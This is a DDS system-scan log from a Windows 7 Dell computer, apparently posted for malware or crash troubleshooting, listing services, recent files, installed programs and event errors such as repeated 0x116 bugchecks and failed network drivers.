R2 ZAtheros Bt&Wlan Coex Agent;ZAtheros Bt&Wlan Coex Agent;C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Ath_CoexAgent.exe [2011-12-29 158880]
R2 ZAtheros Wlan Agent;ZAtheros Wlan Agent;C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [2012-6-28 76960]
R3 afcdp;afcdp;C:\Windows\System32\drivers\afcdp.sys [2012-8-23 285280]
R3 AthBTPort;Atheros Virtual Bluetooth Class;C:\Windows\System32\drivers\btath_flt.sys [2011-12-29 36000]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2012-6-28 95248]
R3 AvastVBoxSvc;AvastVBox COM Service;C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe [2014-11-28 4012248]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;C:\Windows\System32\drivers\btath_a2dp.sys [2011-12-29 338592]
R3 btath_avdt;Atheros Bluetooth AVDT Service;C:\Windows\System32\drivers\btath_avdt.sys [2011-12-29 110752]
R3 BTATH_BUS;Atheros Bluetooth Bus;C:\Windows\System32\drivers\btath_bus.sys [2011-12-29 30368]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;C:\Windows\System32\drivers\btath_hcrp.sys [2011-12-29 167584]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;C:\Windows\System32\drivers\btath_lwflt.sys [2011-12-29 68256]
R3 BTATH_RCP;Bluetooth AVRCP Device;C:\Windows\System32\drivers\btath_rcp.sys [2011-12-29 280992]
R3 BtFilter;BtFilter;C:\Windows\System32\drivers\btfilter.sys [2011-12-29 548000]
R3 IntcDAud;Intel® Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2012-6-28 331264]
R3 iusb3hub;Intel® USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2012-6-28 356120]
R3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2012-6-28 787736]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-6-28 648808]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 DellDigitalDelivery;Dell Digital Delivery Service;C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [2011-10-26 162816]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 BBSvc;Bing Bar Update Service;C:\Program Files (x86)\Microsoft\BingBar\BBSvc.EXE [2011-6-7 191752]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-12-10 114688]
S3 pmxdrv;pmxdrv;C:\Windows\System32\drivers\pmxdrv.sys [2012-11-2 31152]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2014-10-17 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-10-17 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2014-10-17 30208]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-7-28 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-7-2 1255736]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2014-12-26 08:14:01 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{81D8652A-BEBF-4F40-8D07-92F40ED57EBB}\offreg.dll
2014-12-26 08:13:36 11870360 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{81D8652A-BEBF-4F40-8D07-92F40ED57EBB}\mpengine.dll
2014-12-17 18:31:52 144384 ------w- C:\Windows\System32\ieUnatt.exe
2014-12-17 18:31:52 115712 ------w- C:\Windows\SysWow64\ieUnatt.exe
2014-12-11 08:20:01 -------- d-----w- C:\Windows\System32\appraiser
2014-12-11 08:01:22 4121600 ------w- C:\Windows\System32\mf.dll
2014-12-11 08:01:22 3209728 ------w- C:\Windows\SysWow64\mf.dll
2014-12-10 11:19:23 830976 ------w- C:\Windows\System32\appraiser.dll
2014-12-10 11:19:23 741376 ------w- C:\Windows\System32\invagent.dll
2014-12-10 11:19:23 413184 ------w- C:\Windows\System32\generaltel.dll
2014-12-10 11:19:23 396800 ------w- C:\Windows\System32\devinv.dll
2014-12-10 11:19:23 192000 ------w- C:\Windows\System32\aepic.dll
2014-12-10 11:19:23 1232040 ------w- C:\Windows\System32\aitstatic.exe
2014-12-10 11:19:23 1083392 ------w- C:\Windows\System32\aeinv.dll
2014-12-10 11:19:22 227328 ------w- C:\Windows\System32\aepdu.dll
2014-12-10 11:14:13 346624 ------w- C:\Windows\System32\WSManMigrationPlugin.dll
2014-12-06 21:01:12 -------- d-----w- C:\Users\anonymous\AppData\Roaming\PCDr
2014-12-06 21:01:04 -------- d-----w- C:\ProgramData\PCDr
2014-12-06 19:30:41 -------- d-----w- C:\AdwCleaner
2014-12-05 22:48:56 -------- d-----w- C:\photos - digital 7
2014-12-03 18:06:20 188304 ------w- C:\Program Files (x86)\Mozilla Firefox\Plugins\nppdf32.dll
2014-12-03 18:06:20 188304 ------w- C:\Program Files (x86)\Internet Explorer\Plugins\nppdf32.dll
2014-11-29 00:14:48 -------- d-----w- C:\Windows\SysWow64\vbox
2014-11-29 00:14:48 -------- d-----w- C:\Windows\System32\vbox
2014-11-29 00:11:21 43152 ------w- C:\Windows\avastSS.scr
.
==================== Find3M  ====================
.
2014-12-28 00:45:17 129752 ------w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-12-10 13:08:05 71344 ------w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-12-10 13:08:05 701104 ------w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-11-29 00:11:28 1050432 ------w- C:\Windows\System32\drivers\aswsnx.sys
2014-11-29 00:11:22 93568 ------w- C:\Windows\System32\drivers\aswRdr2.sys
2014-11-29 00:11:22 83280 ------w- C:\Windows\System32\drivers\aswMonFlt.sys
2014-11-29 00:11:22 65776 ------w- C:\Windows\System32\drivers\aswRvrt.sys
2014-11-29 00:11:22 29208 ------w- C:\Windows\System32\drivers\aswHwid.sys
2014-11-29 00:11:22 267632 ------w- C:\Windows\System32\drivers\aswVmm.sys
2014-11-29 00:11:22 116728 ------w- C:\Windows\System32\drivers\aswstm.sys
2014-11-24 19:04:56 275080 ------w- C:\Windows\System32\MpSigStub.exe
2014-11-22 03:06:23 2724864 ------w- C:\Windows\System32\mshtml.tlb
2014-11-22 03:06:11 4096 ------w- C:\Windows\System32\ieetwcollectorres.dll
2014-11-22 02:50:39 66560 ------w- C:\Windows\System32\iesetup.dll
2014-11-22 02:50:10 580096 ------w- C:\Windows\System32\vbscript.dll
2014-11-22 02:49:54 48640 ------w- C:\Windows\System32\ieetwproxystub.dll
2014-11-22 02:48:20 88064 ------w- C:\Windows\System32\MshtmlDac.dll
2014-11-22 02:35:29 114688 ------w- C:\Windows\System32\ieetwcollector.exe
2014-11-22 02:34:51 814080 ------w- C:\Windows\System32\jscript9diag.dll
2014-11-22 02:34:07 6039552 ------w- C:\Windows\System32\jscript9.dll
2014-11-22 02:26:31 968704 ------w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-11-22 02:20:44 2724864 ------w- C:\Windows\SysWow64\mshtml.tlb
2014-11-22 02:14:16 77824 ------w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-11-22 02:07:43 501248 ------w- C:\Windows\SysWow64\vbscript.dll
2014-11-22 02:07:17 62464 ------w- C:\Windows\SysWow64\iesetup.dll
2014-11-22 02:06:32 47616 ------w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-11-22 02:05:02 64000 ------w- C:\Windows\SysWow64\MshtmlDac.dll
2014-11-22 01:54:30 620032 ------w- C:\Windows\SysWow64\jscript9diag.dll
2014-11-22 01:47:10 1359360 ------w- C:\Windows\System32\mshtmlmedia.dll
2014-11-22 01:46:58 2125312 ------w- C:\Windows\System32\inetcpl.cpl
2014-11-22 01:40:04 60416 ------w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-11-22 01:29:26 4299264 ------w- C:\Windows\SysWow64\jscript9.dll
2014-11-22 01:28:21 2358272 ------w- C:\Windows\System32\wininet.dll
2014-11-22 01:22:49 2052096 ------w- C:\Windows\SysWow64\inetcpl.cpl
2014-11-22 01:21:57 1155072 ------w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-11-22 01:00:20 1888256 ------w- C:\Windows\SysWow64\wininet.dll
2014-11-21 11:14:22 63704 ------w- C:\Windows\System32\drivers\mwac.sys
2014-11-21 11:14:12 93400 ------w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-11-21 11:14:08 25816 ------w- C:\Windows\System32\drivers\mbam.sys
2014-11-19 09:31:16 1217192 ------w- C:\Windows\SysWow64\FM20.DLL
2014-11-11 03:09:06 1424384 ------w- C:\Windows\System32\WindowsCodecs.dll
2014-11-11 03:08:52 241152 ------w- C:\Windows\System32\pku2u.dll
2014-11-11 03:08:48 728064 ------w- C:\Windows\System32\kerberos.dll
2014-11-11 02:44:45 1230336 ------w- C:\Windows\SysWow64\WindowsCodecs.dll
2014-11-11 02:44:32 186880 ------w- C:\Windows\SysWow64\pku2u.dll
2014-11-11 02:44:25 550912 ------w- C:\Windows\SysWow64\kerberos.dll
2014-11-11 01:46:26 119296 ------w- C:\Windows\System32\drivers\tdx.sys
2014-11-08 03:16:08 2048 ------w- C:\Windows\System32\tzres.dll
2014-11-08 02:45:09 2048 ------w- C:\Windows\SysWow64\tzres.dll
2014-10-30 02:03:43 165888 ------w- C:\Windows\System32\charmap.exe
2014-10-30 01:45:43 155136 ------w- C:\Windows\SysWow64\charmap.exe
2014-10-25 01:57:59 77824 ------w- C:\Windows\System32\packager.dll
2014-10-25 01:32:37 67584 ------w- C:\Windows\SysWow64\packager.dll
2014-10-18 02:05:23 861696 ------w- C:\Windows\System32\oleaut32.dll
2014-10-18 01:33:18 571904 ------w- C:\Windows\SysWow64\oleaut32.dll
2014-10-14 02:16:37 155064 ------w- C:\Windows\System32\drivers\ksecpkg.sys
2014-10-14 02:13:06 683520 ------w- C:\Windows\System32\termsrv.dll
2014-10-14 02:13:00 3241984 ------w- C:\Windows\System32\msi.dll
2014-10-14 02:12:57 1460736 ------w- C:\Windows\System32\lsasrv.dll
2014-10-14 02:09:31 146432 ------w- C:\Windows\System32\msaudite.dll
2014-10-14 02:07:31 681984 ------w- C:\Windows\System32\adtschema.dll
2014-10-14 01:50:47 22016 ------w- C:\Windows\SysWow64\secur32.dll
2014-10-14 01:50:41 2363904 ------w- C:\Windows\SysWow64\msi.dll
2014-10-14 01:49:38 96768 ------w- C:\Windows\SysWow64\sspicli.dll
2014-10-14 01:47:30 146432 ------w- C:\Windows\SysWow64\msaudite.dll
2014-10-14 01:46:02 681984 ------w- C:\Windows\SysWow64\adtschema.dll
2014-10-10 00:57:42 3198976 ------w- C:\Windows\System32\win32k.sys
2014-10-03 02:12:23 310272 ------w- C:\Windows\System32\WsmWmiPl.dll
2014-10-03 02:12:23 2020352 ------w- C:\Windows\System32\WsmSvc.dll
2014-10-03 02:12:22 181248 ------w- C:\Windows\System32\WsmAuto.dll
2014-10-03 02:12:00 500224 ------w- C:\Windows\System32\AUDIOKSE.dll
2014-10-03 02:11:54 284672 ------w- C:\Windows\System32\EncDump.dll
2014-10-03 02:11:51 680960 ------w- C:\Windows\System32\audiosrv.dll
2014-10-03 02:11:51 440832 ------w- C:\Windows\System32\AudioEng.dll
2014-10-03 02:11:51 296448 ------w- C:\Windows\System32\AudioSes.dll
2014-10-03 02:11:49 266240 ------w- C:\Windows\System32\WSManHTTPConfig.exe
2014-10-03 01:45:03 248832 ------w- C:\Windows\SysWow64\WSManMigrationPlugin.dll
2014-10-03 01:45:03 214016 ------w- C:\Windows\SysWow64\WsmWmiPl.dll
2014-10-03 01:45:03 145920 ------w- C:\Windows\SysWow64\WsmAuto.dll
2014-10-03 01:45:03 1177088 ------w- C:\Windows\SysWow64\WsmSvc.dll
2014-10-03 01:44:42 442880 ------w- C:\Windows\SysWow64\AUDIOKSE.dll
2014-10-03 01:44:26 374784 ------w- C:\Windows\SysWow64\AudioEng.dll
2014-10-03 01:44:26 195584 ------w- C:\Windows\SysWow64\AudioSes.dll
2014-10-03 01:44:25 198656 ------w- C:\Windows\SysWow64\WSManHTTPConfig.exe
2014-10-02 18:23:20 94208 ------w- C:\Windows\SysWow64\QuickTimeVR.qtx
2014-10-02 18:23:20 69632 ------w- C:\Windows\SysWow64\QuickTime.qts
.
============= FINISH:  8:57:13.72 ===============
 

 

 

 

.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 6/30/2012 3:48:46 PM
System Uptime: 12/28/2014 8:06:08 AM (0 hours ago)
.
Motherboard: Dell Inc. |  | 0YJPT1
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz | CPU 1 | 3401/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 1851 GiB total, 1516.787 GiB free.
D: is CDROM ()
E: is Removable
F: is Removable
G: is Removable
H: is Removable
J: is FIXED (NTFS) - 1863 GiB total, 709.154 GiB free.
L: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP324: 11/4/2014 5:01:06 AM - Windows Update
RP325: 11/7/2014 5:09:00 AM - Windows Update
RP326: 11/11/2014 2:46:40 AM - Windows Update
RP327: 11/12/2014 3:00:17 AM - Windows Update
RP328: 11/18/2014 4:58:37 AM - Windows Update
RP329: 11/19/2014 3:00:11 AM - Windows Update
RP330: 11/25/2014 5:01:14 AM - Windows Update
RP331: 11/28/2014 7:09:43 PM - avast! antivirus system restore point
RP332: 12/2/2014 3:22:58 AM - Windows Update
RP333: 12/9/2014 5:40:04 AM - Windows Update
RP334: 12/10/2014 4:42:32 AM - Spybot-S&D Spyware removal
RP335: 12/11/2014 3:00:18 AM - Windows Update
RP336: 12/12/2014 3:00:10 AM - Windows Update
RP337: 12/16/2014 3:13:39 AM - Windows Update
RP338: 12/18/2014 3:00:10 AM - Windows Update
RP339: 12/23/2014 3:13:33 AM - Windows Update
.
==== Installed Programs ======================
.
64 Bit HP CIO Components Installer
Accidental Damage Services Agreement
Acronis True Image Home
Adobe AIR
Adobe Community Help
Adobe Download Assistant
Adobe Flash Player 15 ActiveX
Adobe Flash Player 15 Plugin
Adobe Photoshop Elements 10
Adobe Photoshop.com Inspiration Browser
Adobe Reader X (10.1.13) MUI
Ahnenblatt 2.70
AMD APP SDK Runtime
AMD AVIVO64 Codecs
AMD Catalyst Install Manager
ANT Drivers Installer x64
AOL Uninstaller (Choose which Products to Remove)
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ArcSoft PhotoStudio 6
Atheros Bluetooth Suite (64)
Avast Free Antivirus
Bing Bar
Bonjour
BufferChm
C4600
Canon CanoScan 9000F User Registration
Canon MP Navigator EX 3.1
Canon Utilities Solution Menu
CanoScan 9000F Scanner Driver
Catalyst Control Center
Catalyst Control Center - Branding
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
Citrix Authentication Manager
Citrix Receiver
Citrix Receiver (HDX Flash Redirection)
Citrix Receiver Inside
Citrix Receiver Updater
Citrix Receiver(Aero)
Citrix Receiver(DV)
Citrix Receiver(USB)
Consumer In-Home Service Agreement
D3DX10
Definition Update for Microsoft Office 2010 (KB2910899) 32-Bit Edition
Dell DataSafe Local Backup
Dell DataSafe Local Backup - Support Software
Dell DataSafe Online
Dell Digital Delivery
Dell Edoc Viewer
Dell WLAN and Bluetooth Client Installation
Destinations
DeviceDiscovery
eBay
Elements 10 Organizer
Elevated Installer
Eraser 6.0.10.2620
Exif Tag Remover 4.3
Flash Cookie Cleaner
Garmin Communicator Plugin x64
Garmin Express
Garmin Express Tray
Genie Backup Manager
GIMP 2.8.6
Google Update Helper
GoToAssist Corporate
GPBaseService2
HP Customer Participation Program 13.0
HP Imaging Device Functions 13.0
HP Photosmart C4600 All-In-One Driver Software 13.0 Rel .5
HP Print Projects 1.0
HP Smart Web Printing 4.5
HP Solution Center 13.0
HP Update
HPPhotoGadget
hpPrintProjects
HPProductAssistant
HPSSupply
hpWLPGInstaller
Intel® Control Center
Intel® Manageability Engine Firmware Recovery Agent
Intel® Management Engine Components
Intel® Rapid Storage Technology
Intel® USB 3.0 eXtensible Host Controller Driver
Intel® Trusted Connect Service Client
IrfanView (remove only)
iTunes
Junk Mail filter update
Malwarebytes Anti-Malware version 2.0.4.1028
MarketResearch
Mesh Runtime
Microsoft .NET Framework 4.5.1
Microsoft Application Error Reporting
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Home and Student 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Single Image 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft VC9 runtime libraries
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Mozilla Firefox 31.0 (x86 en-US)
Mozilla Maintenance Service
Mozilla Thunderbird 31.2.0 (x86 en-US)
MSVCRT
MSVCRT_amd64
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
Multimedia Card Reader
My Dell
Nero Burning ROM
Nero Burning ROM Help (CHM)
Nero BurningROM 12
Nero ControlCenter
Nero ControlCenter Help (CHM)
Nero Core Components
Nero Prerequisite Installer 2.0
Nero SharedVideoCodecs
Nero Update
Nikon Message Center 2
Nikon Movie Editor
Online Plug-in
Picture Control Utility x64
Prerequisite installer
PS_AIO_05_C4600_Software_Min
PSE10 STI Installer
Quicken WillMaker Plus 2013
QuickTime 7
Realtek High Definition Audio Driver
Scan
Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)
Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)
Security Update for Microsoft .NET Framework 4.5.1 (KB2978128)
Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)
Security Update for Microsoft Excel 2010 (KB2910902) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553154) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2881071) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2899519) 32-Bit Edition
Self-service Plug-in
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Shop for HP Supplies
Skype™ 6.11
SmartWebPrinting
SolutionCenter
Spybot - Search & Destroy
Status
Stream-Cloner V2.10 Build 301
Toolbox
TouchCopy 11
TouchCopy 12
TrayApp
TrueCrypt
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Excel 2010 (KB2589348) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553140) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589386) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597089) 32-Bit Edition
Update for Microsoft Office 2010 (KB2687275) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837602) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition
Update for Microsoft Office 2010 (KB2883019) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889818) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889828) 32-Bit Edition
Update for Microsoft Office 2010 (KB2910896) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2597088) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2880517) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
ViewNX 2
VLC media player 2.1.3
WebReg
WinCalendar V4
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1)
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Mesh ActiveX Control for Remote Connections
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
WinZip
Yahoo! Toolbar
.
==== Event Viewer Messages From Past Week ========
.
12/28/2014 8:09:10 AM, Error: Service Control Manager [7034]  - The Dell Digital Delivery Service service terminated unexpectedly.  It has done this 1 time(s).
12/28/2014 8:06:53 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8016c574e0, 0xfffff880056b5910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-30045-01.
12/28/2014 7:55:52 AM, Error: Schannel [36888]  - The following fatal alert was generated: 40. The internal error state is 252.
12/28/2014 7:50:13 AM, Error: Schannel [36887]  - The following fatal alert was received: 20.
12/28/2014 5:55:44 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801bcf2010, 0xfffff88005221910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-21481-01.
12/28/2014 5:13:34 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8016e724e0, 0xfffff8800520c910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-24850-01.
12/28/2014 5:06:18 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801c7c8010, 0xfffff880056b8910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-27705-01.
12/28/2014 4:35:07 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801dbfd1e0, 0xfffff8800567a910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-29936-01.
12/27/2014 7:36:39 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service stisvc with arguments "" in order to run the server: {A1F4E726-8CF1-11D1-BF92-0060081ED811}
12/27/2014 7:26:27 PM, Error: Service Control Manager [7001]  - The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:26:27 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
12/27/2014 7:26:27 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netprofm with arguments "" in order to run the server: {A47979D2-C419-11D9-A5B4-001185AD2B89}
12/27/2014 7:26:27 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netman with arguments "" in order to run the server: {BA126AD1-2166-11D1-B1D0-00805FC1270E}
12/27/2014 7:26:26 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {9E175B6D-F52A-11D8-B9A5-505054503030}
12/27/2014 7:26:25 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
12/27/2014 7:26:20 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC}
12/27/2014 7:25:35 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801794c1d0, 0xfffff880052fe910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-19219-01.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  AFD aswRdr aswRvrt aswSnx aswSP aswVmm DfsC discache NetBIOS NetBT nsiproxy Psched rdbss spldr tdx truecrypt vwififlt Wanarpv6 WfpLwf
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The Workstation service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The TCP/IP NetBIOS Helper service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The SMB MiniRedirector Wrapper and Engine service depends on the Redirected Buffering Sub Sysytem service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The SMB 2.0 MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The SMB 1.x MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The Network Store Interface Service service depends on the NSI proxy service driver. service which failed to start because of the following error:  A device attached to the system is not functioning.
